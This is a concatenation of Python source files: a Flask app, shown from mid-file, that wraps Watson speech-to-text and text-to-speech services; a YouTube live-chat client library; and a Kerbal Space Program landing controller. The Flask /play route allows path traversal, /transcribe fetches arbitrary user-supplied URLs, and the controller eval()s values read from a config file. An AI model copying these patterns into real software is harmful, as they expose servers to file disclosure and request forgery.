env_var = 'STT_HOST'
if env_var in os.environ:
STT_HOST = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_PORT'
if env_var in os.environ:
STT_PORT = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'URL_ROOT'
if env_var in os.environ:
url_root = os.environ[env_var]
else:
url_root = ''
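# A minimal sketch (hypothetical helper, not used above) of how the repeated
# environment-variable lookups could be factored:
#
#   def require_env(name, default=None):
#       if name in os.environ:
#           return os.environ[name]
#       if default is not None:
#           return default
#       raise Exception("Error no %s Defined!" % name)
#
#   TTS_API_URL = require_env('TTS_API_URL')
#   url_root = require_env('URL_ROOT', default='')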
AUDIO_FORMAT = 'audio/ogg'
# Call to IAM to get an access token to use with STT websocket API.
http_headers = {'Content-Type': 'application/json',
'Accept': 'application/json',
'X-Watson-Learning-Opt-Out': 'true',
'X-Watson-Metadata': 'customer_id=Fred'}
stt_auth = ('apikey', STT_API_KEY)
tts_auth = ('apikey', TTS_API_KEY)
iam_token_manager = IAMTokenManager(apikey=STT_API_KEY)
stt_access_token = iam_token_manager.get_token()
# Get the list of available TTS voices
result = requests.get(TTS_API_URL + '/v1/voices', auth=tts_auth, headers=http_headers)
if result.status_code != 200:
raise Exception('Error retrieving voices: %s - %s' % (result.status_code, result.content))
content = result.json()
voice_list = []
for voice in content['voices']:
voice_list.append({'name': voice['name'], 'description': voice['description']})
# Get the list of available STT language models
result = requests.get(STT_API_URL + '/v1/models', auth=stt_auth, headers=http_headers)
if result.status_code != 200:
raise Exception('Error retrieving models: %s - %s' % (result.status_code, result.content))
content = result.json()
model_list = []
for model in content['models']:
model_list.append({'name': model['name'], 'description': model['description']})
@app.before_request
def do_something_whenever_a_request_comes_in():
r = request
url = r.url
method = r.method
print('>>>> Call into Speech Test: %s ' % method, url)
print('Environ:\t%s' % request.environ)
print('Path:\t%s' % request.path)
print('Full_path:\t%s' % request.full_path)
print('Script_root:\t%s' % request.script_root)
print('Url:\t%s' % request.url)
print('Base_url:\t%s' % request.base_url)
print('Url_root:\t%s' % request.url_root)
print('Scheme:\t%s' % request.scheme)
@app.after_request
def apply_headers(response):
# These are to fix low severity vulnerabilities identified by AppScan
# in a dynamic scan. Also to prevent caching of content. Mostly to allow for rapid changing/debugging
# of style sheets.
response.headers['Content-Security-Policy'] = "object-src 'none'; script-src 'strict-dynamic'"
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-XSS-Protection'] = '1; mode=block'
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "0"
response.headers['Cache-Control'] = 'public, max-age=0'
return response
@app.errorhandler(Exception)
def handle_bad_request(e):
print('Error: %s' % str(e))
return render_template('blank.html', message=str(e))
@app.route('/')
def welcomeToMyapp():
return render_template('index.html')
@app.route('/favicon.ico')
def favicon():
return app.send_static_file('images/favicon-96x96.png')
@app.route('/build')
def build():
return app.send_static_file('build.txt')
@app.route('/voices')
def voices():
result = requests.get(TTS_API_URL + '/v1/voices', auth=tts_auth, headers=http_headers)
if result.status_code == 200:
voices = result.json()
return jsonify(voices)
else:
raise Exception(result.content)
@app.route('/tts', methods=['GET', 'POST'])
def tts():
return render_template('tts.html',
voice_list=voice_list,
voice="Lisa: American English female voice. Dnn technology.",
audio_format_list=AUDIO_FORMATS,
audio_file="static/audio/tts-lisa-intro.ogg",
audio_format="audio/ogg")
@app.route('/synthesize', methods=['GET', 'POST'])
def synthesize():
form = request.form
text = form['text_to_synthsize']
voice = form['voice']
audio_format = form['audio_format']
headers = {"Content-Type": "application/json", "accept": audio_format}
parameters = {'voice': voice}
payload = {"text": text}
response = requests.post(TTS_API_URL + '/v1/synthesize',
auth=tts_auth,
headers=headers,
params=parameters,
data=json.dumps(payload))
if response.status_code == 200:
sound_data = response.content
index = audio_format.find('/')
file_type = audio_format[index+1:len(audio_format)]
audio_filename = "static/audio/%s.%s" % (str(uuid.uuid1()), file_type)
f = open(audio_filename, 'wb')
f.write(sound_data)
f.close()
print('returning audio from %s' % audio_filename)
return render_template('tts.html',
voice_list=voice_list,
voice=voice,
audio_format_list=AUDIO_FORMATS,
audio_file=audio_filename,
audio_format=audio_format)
else:
message = "Error synthesizing \'%s\' with voice \'%s\'.\n<br>%s - %s" % (text,
voice,
response.status_code,
response.content)
return render_template('blank.html',
message=message)
@app.route('/play', defaults={'file_path': ''})
@app.route('/play/<path:file_path>')
def play(file_path):
BASE_DIR = './static/audio'
abs_path = os.path.join(BASE_DIR, file_path)
if not os.path.exists(abs_path):
return abort(404)
if os.path.isfile(abs_path):
return render_template('play.html',
audio_file=abs_path)
else:
files = os.listdir(abs_path)
return render_template('list_files.html', files=files)
@app.route('/models')
def models():
result = requests.get(STT_API_URL + '/v1/models', auth=stt_auth, headers=http_headers)
if result.status_code == 200:
models = result.json()
return jsonify(models)
else:
raise Exception(result.content)
@app.route('/stt', methods=['GET', 'POST'])
def stt():
m = model_list
return render_template('stt.html',
model_list=model_list,
audio_file="static/audio/stt-kate-intro.ogg",
audio_format="audio/ogg")
@app.route('/transcribe', methods=['GET', 'POST'])
def transcribe():
form = request.form
audio_url = form['url_to_transcribe']
model = form['model']
# Checkbox-style options: present in the submitted form means enabled.
audio_metrics = 'audio_metrics' in form
processing_metrics = 'processing_metrics' in form
interim_results = 'interim_results' in form
result = requests.get(audio_url)
if result.status_code != 200:
raise Exception('Error %s retrieving audio file \'%s\'.' % (result.status_code, audio_url))
audio_content = result.content
recognize_url = "%s/v1/recognize?access_token=%s&model=%s" % (STT_WS_URL, stt_access_token, model)
# output and final_text are arrays used to get results back from the websocket callback routines below.
output = []
final_text = []
# started is set once the websocket interface is open and stt indicates that it is listening
started = threading.Event()
# completed is set once we see final=true in the transcription results
completed = threading.Event()
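# Overall flow: once the socket opens, on_open sends the JSON "start" action and sets
# 'started'; the main thread then streams the audio as a binary frame, sends the JSON
# "stop" action, and waits on 'completed', which on_message sets when a result with
# "final": true (or an error) arrives, before rendering the page.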
# on_message, on_open, on_close, on_error are for handling callbacks from websocket
def on_message(ws, message):
# this does the heavy lifting to process the transcription results. It looks for a 'final' flag
# in the transcription results and when found signals the completed event.
print("### message ###")
print(message)
json_message = json.loads(message)
# check first to see if STT flagged an error, which comes back in the message payload. if so, set the
# completed event to stop processing
error = json_message.get('error', None)
if error is not None:
output.append(json_message)
completed.set()
# Look for audio metrics and if found, add to output
results = json_message.get('audio_metrics', None)
if results is not None:
output.insert(0, json_message)
results = json_message.get('results', None)
# Look for transcription results and process
if results is not None:
output.append(json_message)
result = results[0]
final = result.get('final')
if final:
# If final is set we know we have the final transcription results, so record this
alternatives = result.get('alternatives')
if alternatives is not None and len(alternatives) > 0:
final_text.append(alternatives[0]['transcript'])
completed.set()
def on_error(ws, error):
print("### error ###")
print(error)
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### opened ###")
msg = {"action": "start",
"audio_metrics": audio_metrics,
"interim_results": interim_results,
"processing_metrics": processing_metrics}
ws.send(json.dumps(msg).encode('utf8'))
started.set()
def ws_thread(ws):
ws.run_forever()
# open the websocket and start a thread for processing
websocket.enableTrace(True)
ws = websocket.WebSocketApp(recognize_url, on_open=on_open, on_message=on_message, on_error=on_error,
on_close=on_close)
th = Thread(target=ws_thread, args=(ws,))
th.start()
# wait for the started event to indicate that STT is listening
started.wait(None)
ws.send(audio_content, opcode=websocket.ABNF.OPCODE_BINARY)
msg = {"action": "stop"}
ws.send(json.dumps(msg).encode('utf8'))
# Wait for the completed event, which is set once we see the final transcription results.
completed.wait(None)
ws.close()
if len(final_text) > 0:
text = final_text[0]
else:
text = ''
return render_template('stt.html',
final_text=text,
output=json.dumps(output, indent=4),
model_list=model_list,
audio_file=audio_url,
audio_title="%s - %s" % (model, audio_url))
if __name__ == '__main__':
print('Starting %s....' % sys.argv[0])
print('Python: ' + sys.version)
print("url_root: %s" % url_root)
app.run(host='0.0.0.0', port=int(port))
|
ytchat.py
|
import cgi
import json
import logging
import sys
import threading
import time
from datetime import datetime, timedelta
from json import dumps, loads
from pprint import pformat
import dateutil.parser
import httplib2
from oauth2client.file import Storage
import requests
PY3 = sys.version_info[0] == 3
if PY3:
from urllib.parse import urlencode
from queue import Queue
else:
from Queue import Queue
from urllib import urlencode
class YoutubeLiveChatError(Exception):
def __init__(self, message, code=None, errors=None):
Exception.__init__(self, message)
self.code = code
self.errors = errors
def _json_request(http, url, method='GET', headers=None, body=None):
resp, content = http.request(url, method, headers=headers, body=body)
content_type, content_type_params = cgi.parse_header(resp.get('content-type', 'application/json; charset=UTF-8'))
charset = content_type_params.get('charset', 'UTF-8')
data = loads(content.decode(charset))
if 'error' in data:
error = data['error']
raise YoutubeLiveChatError(error['message'], error.get('code'), error.get('errors'))
return resp, data
def get_datetime_from_string(datestr):
dt = dateutil.parser.parse(datestr)
return dt
def get_top_stream_chat_ids(credential_file):
playlist_id = "PLiCvVJzBupKmEehQ3hnNbbfBjLUyvGlqx"
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/playlistItems?"
params = {'part': 'contentDetails','playlistId':playlist_id}
params = urlencode(params)
resp, data = _json_request(http, url + params)
chatids = []
for item in data['items']:
videoid = item['contentDetails']['videoId']
url = "https://www.googleapis.com/youtube/v3/videos?"
params = {'part': 'liveStreamingDetails','id': videoid}
params = urlencode(params)
response_obj, video_data = _json_request(http, url + params)
chatId = video_data['items'][0]['liveStreamingDetails']['activeLiveChatId']
chatids.append(chatId)
return chatids
def get_live_chat_id_for_stream_now(credential_file):
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/liveBroadcasts?"
params = {'part': 'snippet', 'mine': 'true'}
params = urlencode(params)
resp, data = _json_request(http, url + params)
return data['items'][0]['snippet']['liveChatId']
def get_livechat_id(api_key, live_stream_id):
url = f'https://www.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&key={api_key}&id={live_stream_id}'
res = requests.get(url)
data = json.loads(res.text)['items'][0]['liveStreamingDetails']['activeLiveChatId']
return data
def get_live_chat_id_for_broadcast_id(broadcastId, credential_file):
storage = Storage(credential_file)
credentials = storage.get()
http = credentials.authorize(httplib2.Http())
url = "https://www.googleapis.com/youtube/v3/liveBroadcasts?"
#url = 'https://www.googleapis.com/youtube/v3/videos'
params = {'part': 'snippet', 'id': broadcastId}
params = urlencode(params)
resp, data = _json_request(http, url + params)
return data['items']#[0]['snippet']['liveChatId']
def channelid_to_name(channelId, http):
url = "https://www.googleapis.com/youtube/v3/channels?part=snippet&id={0}".format(channelId)
response, data = _json_request(http, url)
return data['items'][0]['snippet']['title']
class MessageAuthor(object):
def __init__(self, json):
self.is_verified = json['isVerified']
self.channel_url = json['channelUrl']
self.profile_image_url = json['profileImageUrl']
self.channel_id = json['channelId']
self.display_name = json['displayName']
self.is_chat_owner = json['isChatOwner']
self.is_chat_sponsor = json['isChatSponsor']
self.is_chat_moderator = json['isChatModerator']
class LiveChatMessage(object):
def __init__(self, http, json):
self.http = http
self.json = json
self.etag = json['etag']
self.id = json['id']
snippet = json['snippet']
self.type = snippet['type']
self.message_text = snippet['textMessageDetails']['messageText']
self.display_message = snippet['displayMessage']
self.has_display_content = snippet['hasDisplayContent']
self.live_chat_id = snippet['liveChatId']
self.published_at = get_datetime_from_string(snippet['publishedAt'])
self.author = MessageAuthor(json['authorDetails'])
def delete(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/messages"
url = url + '?id={0}'.format(self.id)
resp, content = self.http.request(url, 'DELETE')
def permaban(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
message = {u'snippet': {u'liveChatId': self.live_chat_id, u'type': 'permanent', "bannedUserDetails": {"channelId": self.author.channel_id}}}
jsondump = dumps(message)
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=jsondump)
jsonresponse = dumps(data)
return data['id']
def tempban(self, timee = 300):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
message = {u'snippet': {u'liveChatId': self.live_chat_id, u'type': 'temporary', "banDurationSeconds": timee, "bannedUserDetails": {"channelId": self.author.channel_id}}}
jsondump = dumps(message)
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=jsondump)
def unban(self, id):
url = "https://www.googleapis.com/youtube/v3/liveChat/bans"
url = url + '?id=' + id
content = self.http.request(url, 'DELETE')
def __repr__(self):
if PY3:
return self.display_message
else:
return self.display_message.encode("UTF-8")
class LiveChatModerator(object):
def __init__(self, http, json):
self.http = http
self.json = json
self.etag = json['etag']
self.id = json['id']
snippet = json['snippet']
self.channel_id = snippet['moderatorDetails']['channelId']
self.channel_url = snippet['moderatorDetails']['channelUrl']
self.display_name = snippet['moderatorDetails']['displayName']
self.profile_image_url = snippet['moderatorDetails']['profileImageUrl']
def delete(self):
url = "https://www.googleapis.com/youtube/v3/liveChat/moderators"
url = url + '?id={0}'.format(self.id)
resp, content = self.http.request(url, 'DELETE')
def __repr__(self):
if PY3:
return self.display_name
else:
return self.display_name.encode("UTF-8")
class YoutubeLiveChat(object):
def __init__(self, credential_filename, livechatIds):
self.logger = logging.getLogger(name="YoutubeLiveChat")
self.chat_subscribers = []
self.thread = threading.Thread(target=self.run)
self.livechatIds = {}
self.message_queue = Queue()
storage = Storage(credential_filename)
credentials = storage.get()
self.http = credentials.authorize(httplib2.Http())
self.livechat_api = LiveChatApi(self.http)
for chat_id in livechatIds:
self.livechatIds[chat_id] = {'nextPoll': datetime.now(), 'msg_ids': set(), 'pageToken': None}
result = self.livechat_api.live_chat_messages_list(chat_id)
while result['items']:
pollingIntervalMillis = result['pollingIntervalMillis']
self.livechatIds[chat_id]['msg_ids'].update(msg['id'] for msg in result['items'])
self.livechatIds[chat_id]['nextPoll'] = datetime.now() + timedelta(seconds=pollingIntervalMillis / 1000)
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
self.livechatIds[chat_id]['pageToken'] = result['nextPageToken']
time.sleep(result['pollingIntervalMillis'] / 1000)
result = self.livechat_api.live_chat_messages_list(chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
else:
break
self.logger.debug("Initalized")
def start(self):
self.running = True
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def join(self):
self.thread.join()
def stop(self):
self.running = False
if self.thread.is_alive():
self.thread.join()
def run(self):
while self.running:
# send a queued message
if not self.message_queue.empty():
to_send = self.message_queue.get()
self._send_message(to_send[0], to_send[1])
# check for messages
for chat_id in self.livechatIds:
if self.livechatIds[chat_id]['nextPoll'] < datetime.now():
msgcache = self.livechatIds[chat_id]['msg_ids']
result = None
try:
result = self.livechat_api.live_chat_messages_list(
chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
except Exception as e:
self.logger.warning(e)
self.logger.warning("Exception while trying to get yt api")
if result:
if 'pollingIntervalMillis' not in result:
self.logger.warning("Empty result")
self.logger.warning(pformat(result))
continue
pollingIntervalMillis = result['pollingIntervalMillis']
while result['items']:
latest_messages = {msg['id'] for msg in result['items']}
if msgcache:
new_messages = latest_messages.difference(msgcache)
else:
new_messages = latest_messages
new_msg_objs = [LiveChatMessage(self.http, json)
for json in result['items'] if json['id'] in new_messages]
self.livechatIds[chat_id]['msg_ids'].update(new_messages)
nextPoll = datetime.now() + timedelta(seconds=pollingIntervalMillis / 1000)
self.livechatIds[chat_id]['nextPoll'] = nextPoll
if new_msg_objs:
self.logger.debug("New chat messages")
self.logger.debug(new_msg_objs)
for callback in self.chat_subscribers:
try:
callback(new_msg_objs, chat_id)
except:
msg = "Exception during callback to {0}".format(callback)
self.logger.exception(msg)
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
self.livechatIds[chat_id]['pageToken'] = result['nextPageToken']
time.sleep(result['pollingIntervalMillis'] / 1000)
result = self.livechat_api.live_chat_messages_list(
chat_id,
pageToken=self.livechatIds[chat_id]['pageToken'])
else:
break
time.sleep(1)
def get_moderators(self, livechatId):
result = self.livechat_api.live_chat_moderators_list(livechatId)
if result['items']:
mods = result['items']
if result['pageInfo']['totalResults'] > result['pageInfo']['resultsPerPage']:
while result['items']:
result = self.livechat_api.live_chat_moderators_list(livechatId, pageToken=result['nextPageToken'])
if result['items']:
mods.extend(result['items'])
else:
break
if 'nextPageToken' not in result:
break
moderator_objs = [LiveChatModerator(self.http, json) for json in mods]
return moderator_objs
def set_moderator(self, livechatId, moderator_channelid):
message = {u'snippet': {u'liveChatId': livechatId, "moderatorDetails": {"channelId": moderator_channelid}}}
jsondump = dumps(message)
return self.livechat_api.live_chat_moderators_insert(jsondump)
def send_message(self, text, livechatId):
self.message_queue.put((text, livechatId))
def _send_message(self, text, livechatId):
message = {
u'snippet': {
u'liveChatId': livechatId,
"textMessageDetails": {
"messageText": text
},
"type": "textMessageEvent"
}
}
jsondump = dumps(message)
response = self.livechat_api.live_chat_messages_insert(jsondump)
self.logger.debug(pformat(response))
self.livechatIds[livechatId]['msg_ids'].add(response['id'])
def subscribe_chat_message(self, callback):
self.chat_subscribers.append(callback)
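# Example usage (a sketch; the credential file below is hypothetical):
#
#   chat_id = get_live_chat_id_for_stream_now('oauth_creds.json')
#   chat = YoutubeLiveChat('oauth_creds.json', [chat_id])
#   def on_messages(messages, chat_id):
#       for msg in messages:
#           print(msg.author.display_name, msg.display_message)
#   chat.subscribe_chat_message(on_messages)
#   chat.start()
#   chat.join()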
class LiveChatApi(object):
def __init__(self, http):
self.http = http
self.logger = logging.getLogger("liveChat_api")
def get_all_messages(self, livechatId):
data = self.live_chat_messages_list(livechatId, maxResults=2000)
total_items = data['pageInfo']['totalResults']
pageToken = data['nextPageToken']
if len(data['items']) < total_items:
time.sleep(data['pollingIntervalMillis'] / 1000)
while len(data['items']) < total_items:
other_data = self.live_chat_messages_list(livechatId, maxResults=2000, pageToken=pageToken)
if not other_data['items']:
break
else:
data['items'].extend(other_data['items'])
pageToken = other_data['nextPageToken']
time.sleep(other_data['pollingIntervalMillis'] / 1000)
return data
def live_chat_moderators_list(self, livechatId, part='snippet', maxResults=5, pageToken=None):
url = 'https://www.googleapis.com/youtube/v3/liveChat/moderators'
url = url + '?liveChatId={0}'.format(livechatId)
if pageToken:
url = url + '&pageToken={0}'.format(pageToken)
url = url + '&part={0}'.format(part)
url = url + '&maxResults={0}'.format(maxResults)
resp, data = _json_request(self.http, url)
return data
def live_chat_moderators_insert(self, liveChatModerator):
url = 'https://www.googleapis.com/youtube/v3/liveChat/moderators'
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=liveChatModerator)
return data
def live_chat_messages_list(self,
livechatId,
part='snippet,authorDetails',
maxResults=200,
pageToken=None,
profileImageSize=None):
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
url = url + '?liveChatId={0}'.format(livechatId)
if pageToken:
url = url + '&pageToken={0}'.format(pageToken)
if profileImageSize:
url = url + '&profileImageSize={0}'.format(profileImageSize)
url = url + '&part={0}'.format(part)
url = url + '&maxResults={0}'.format(maxResults)
resp, data = _json_request(self.http, url)
return data
def live_chat_messages_insert(self, liveChatMessage):
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
url = url + '?part=snippet'
resp, data = _json_request(self.http,
url,
'POST',
headers={'Content-Type': 'application/json; charset=UTF-8'},
body=liveChatMessage)
self.logger.debug(pformat(resp))
return data
def live_chat_message_delete(self, idstring):
"DELETE https://www.googleapis.com/youtube/v3/liveChat/messages?id=<message id>"
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages?id={0}'.format(idstring)
return self.http.request(url, 'DELETE')
|
KSP_controller.py
|
import krpc
import time
import math
import numpy as np
import numpy.linalg as npl
import SC_solver as solver
import SC_params
from KSP_controller_utils import *
from threading import Thread
print('--------')
params = {}
with open('KSP_controller_params.txt', 'r', encoding='utf-8') as f:
for line in f:
pair = line.split('#')[0].split('=')
if len(pair) == 2:
key = pair[0].strip()
value = eval(pair[1])
params[key] = value
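# Each non-comment line of KSP_controller_params.txt is expected to look like
# "key = python_expression" (values below are hypothetical), e.g.:
#   g0 = 9.81              # standard gravity
#   throttle_limit = (0.1, 1.0)
# Anything after '#' is ignored and the right-hand side is eval()'d, so tuples
# and lists are allowed.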
print('----------params------------')
for k in (params):
print(' %s: \n%s' % (k, params[k]))
print('\n\ninitializing...')
deg2rad = math.pi / 180
rad2deg = 180 / math.pi
g0 = params['g0']
# connect to kRPC
print('connecting...')
conn = krpc.connect(name='SC_controller')
space_center = conn.space_center
vessel = space_center.active_vessel
flight = vessel.flight()
body = vessel.orbit.body
engine_gimbal = [m for m in vessel.parts.with_name('SSME')[0].modules if m.name == 'ModuleGimbal'][0]
# StarShip Main Engine (a deliberate misnomer)
engine_y = vessel.parts.with_name('SSME')[0].position(vessel.reference_frame)[1]
# starship flap
get_hinge = lambda tagname:[m for m in vessel.parts.with_tag(tagname)[0].modules if m.name=='ModuleRoboticServoHinge'][0]
h_fl = get_hinge('h_f_l')
h_fr = get_hinge('h_f_r')
h_rl = get_hinge('h_r_l')
h_rr = get_hinge('h_r_r')
#set 'Target Angle' 0~180
set_deploy = lambda h, deploy: h.set_field_float('Target Angle', math.asin(clamp(deploy, 0, 1)) * rad2deg + 5)
set_retract = lambda h:h.set_field_float('Target Angle', 0)
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1)
def combine_flaps(pitch_up, spin_right):
pitch_up = clamp(pitch_up, -1, 1)
#roll_right = clamp(roll_right, -1, 1)
spin_right = clamp(spin_right, -1, 1)
ctrl_fl = pitch_up
ctrl_fr = pitch_up
ctrl_rl = -pitch_up
ctrl_rr = -pitch_up
gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
ctrl_fl += gap
ctrl_fr += gap
ctrl_rl += gap
ctrl_rr += gap
ctrl_fl += -spin_right * 0.4
ctrl_fr += spin_right * 0.4
ctrl_rl += spin_right * 0.28
ctrl_rr += -spin_right * 0.28
set_deploy(h_fl, (ctrl_fl) / 2. + 0.5)
set_deploy(h_fr, (ctrl_fr) / 2. + 0.5)
set_deploy(h_rl, (ctrl_rl) / 2. + 0.5)
set_deploy(h_rr, (ctrl_rr) / 2. + 0.5)
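# Mixing summary: pitch_up deflects the front and rear flap pairs in opposite
# directions, spin_right deflects the left/right flaps differentially, and the
# 'gap' term shifts all four commands so the largest equals 0.95, keeping every
# flap inside its usable range. For example, combine_flaps(0.2, 0.0) ends up
# commanding the front flaps to deploy more than the rear ones.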
def retract_flaps():
(h_fl).set_field_float('Target Angle', 5)
(h_fr).set_field_float('Target Angle', 5)
(h_rl).set_field_float('Target Angle', 5)
(h_rr).set_field_float('Target Angle', 5)
#gimbal
#hinge_x = [m for m in vessel.parts.with_tag('hx')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_z = [m for m in vessel.parts.with_tag('hz')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_offset_y = hinge_x.part.position(vessel.reference_frame)[1]
#gimbalX = lambda angle:hinge_x.set_field_float('Target Angle', angle)
#gimbalY = lambda angle:hinge_z.set_field_float('Target Angle', angle)
#print(hinge_x.fields)
delta_time = 0.01
#target
target_lat = params['target_lat'] * deg2rad
target_lon = params['target_lon'] * deg2rad
target_height = params['target_height']
target_axis = target_height + body.surface_height(target_lat * rad2deg, target_lon * rad2deg) + body.equatorial_radius
target_body_pos = np.array((math.cos(target_lon) * math.cos(target_lat), math.sin(target_lat), math.sin(target_lon) * math.cos(target_lat))) * target_axis
#limit
throttle_limit = params['throttle_limit']
throttle_limit_ctrl = params['throttle_limit_ctrl']
max_tilt = np.deg2rad(params['max_tilt'])
max_tilt_off = np.deg2rad(params['max_tilt_off'])
# build a VesselProfile from the krpc vessel object
def get_vessel_profile(vessel):
p = SC_params.VesselProfile()
p.isp = vessel.specific_impulse
p.g = vec(-g0, 0., 0.) # gravity
p.m_dry = vessel.dry_mass
p.gamma_gs = np.deg2rad(params['gamma_gs']) # glide slope
p.theta_max = np.linspace(np.deg2rad(params['max_tilt']), np.deg2rad(10), SC_params.SuperParams().K) # tilt
p.omega_max = np.deg2rad(params['max_omega']) # rotation vel
p.delta_max = np.deg2rad(params['max_delta']) # gimbal
p.T_min = vessel.available_thrust * throttle_limit[0]
p.T_max = vessel.available_thrust * throttle_limit[1]
p.r_T_B = vec(engine_y, 0., 0.) # thrust offset
p.J_B_I = np.array(vessel.inertia_tensor).reshape((3, 3))
p.airfric_k = params['airfric_k']
p.time_guess = params['tf_guess']
return p
# predict the VesselState when the vessel falls to the given altitude, based on the krpc vessel object
def predict_vessel_state(vessel, est_height):
# ref_target flight
vel = vec(vessel.velocity(ref_target))
pos = vec(vessel.position(ref_target))
est_t = (pos[0] - est_height) / (-vel[0]) # assume constant velocity
est_pos = pos + est_t * vel
hdg_right = (flight.heading + 90) * deg2rad # heading of the vessel's right-hand side
rot_axis = v3(0, math.cos(hdg_right), math.sin(hdg_right))
rot_quat = quat(rot_axis, 90 * deg2rad)
#qx, qy, qz, qw = vessel.rotation(ref_target) # xyzw to wxyz
qx, qy, qz, qw = rot_quat # xyzw to wxyz
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = est_pos
state.vel = vel
state.rotation = vec(qw, qx, qy, qz)
#state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
def get_final_state(vessel, final_height):
optimal_acc = vessel.available_thrust / vessel.mass * params['final_throttle'] - g0
final_vel = math.sqrt(2 * optimal_acc * final_height)
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = vec(final_height, 0, 0)
state.vel = vec(-final_vel, 0, 0)
state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
#fall attitude
ctrl_fall_pitch = PID()
ctrl_fall_pitch.kp = params['ctrl_fall_pitch.kp']
ctrl_fall_pitch.kd = params['ctrl_fall_pitch.kd']
#ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki'] # set that later
ctrl_fall_pitch.integral_limit = params['ctrl_fall_pitch.integral_limit']
ctrl_fall_yaw = PID()
ctrl_fall_yaw.kp = params['ctrl_fall_yaw.kp']
ctrl_fall_yaw.kd = params['ctrl_fall_yaw.kd']
ctrl_fall_distance = PID()
ctrl_fall_distance.kp = params['ctrl_fall_distance.kp']
ctrl_fall_distance.kd = params['ctrl_fall_distance.kd']
#rotation
ctrl_x_rot = PID()
ctrl_x_rot.kp = params['ctrl_x_rot.kp']
ctrl_x_rot.kd = params['ctrl_x_rot.kd']
#ctrl_x_rot.redundancy = 0.1
ctrl_y_avel_kp = params['ctrl_y_avel_kp']
ctrl_z_rot = PID()
ctrl_z_rot.kp = params['ctrl_z_rot.kp']
ctrl_z_rot.kd = params['ctrl_z_rot.kd']
#ctrl_z_rot.redundancy = 0.1
# measured values
#torque = v3(3.66e+04, 5000, 3.66e+04)
#torque_k = v3(8.2e+04-3.66e+04, 0, 8.2e+04-3.66e+04)
#torque = v3(10300.000011920929, 10300.000011920929, 10300.000011920929)
#torque_k = v3(15183.20083618, 10772.2761631, 15183.24184418)
#print(vessel.available_torque)
# k
k_x = params['k_x']
k_v = params['k_v']
# final
final_throttle = params['final_throttle']
final_kp = params['final_kp']
# time init
game_delta_time = 0.02
game_prev_time = space_center.ut
start_time = time.time()
# references
print('creating target frame...')
ref_local = vessel.reference_frame
ref_surface = vessel.surface_reference_frame # surface reference frame
ref_body = body.reference_frame
ref_target_temp = space_center.ReferenceFrame.create_relative(ref_body, position=target_body_pos)
ref_target = space_center.ReferenceFrame.create_hybrid(ref_target_temp, rotation=ref_surface, velocity=ref_target_temp)
prev_vel = vec(vessel.velocity(ref_surface))
K = SC_params.SuperParams().K
solved_path = None
n_i = -1
error = vec(vessel.position(ref_target))
print('current error: %s' % error)
debug_lines = params['debug_lines']
if debug_lines:
print('debug lines...')
lines = [conn.drawing.add_line((0,0,0),(0,0,0), ref_target) for i in range(K-1)]
directions = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)]
thrustvecs = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)]
target_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
target_line.color = (0,0,1)
target2_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
target2_line.color = (0,0,1)
head_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target)
head_line.color = (0,1,1)
for line in directions:
line.color = (1,0,0)
for line in thrustvecs:
line.color = (1,0,1)
nav_mode = 'none'
frcount = 0
def update_lines(x, u):
print('debug lines...')
m_u = vessel.available_thrust
for i in range(K-1):
lines[i].start = x[1:4, i]
lines[i].end = x[1:4, i+1]
for i in range(K):
mat = rotation_mat(x[7:11, i])
directions[i].start = x[1:4, i]
directions[i].end = x[1:4, i] + transform(vec(1, 0, 0), mat) * 5
thrustvecs[i].start = x[1:4, i]
thrustvecs[i].end = x[1:4, i] - transform(u[:, i], mat) / m_u * 10
def find_nearest_index(rk, vk, error):
nearest_mag = npl.norm(rk[:, 0] - error)
nearest_i = 0
for i in range(rk.shape[1]):
mag = npl.norm(rk[:, i] - error) # + npl.norm(x[3:6, i] - v) * 0.2
if mag < nearest_mag:
nearest_mag = mag
nearest_i = i
v = vk[:, nearest_i]
v_norm = npl.norm(v)
v_dir = v / v_norm
frac = clamp(np.dot(error - rk[:, nearest_i], v_dir) / (tf / K * v_norm), 0.5, -0.5)
return nearest_i + frac
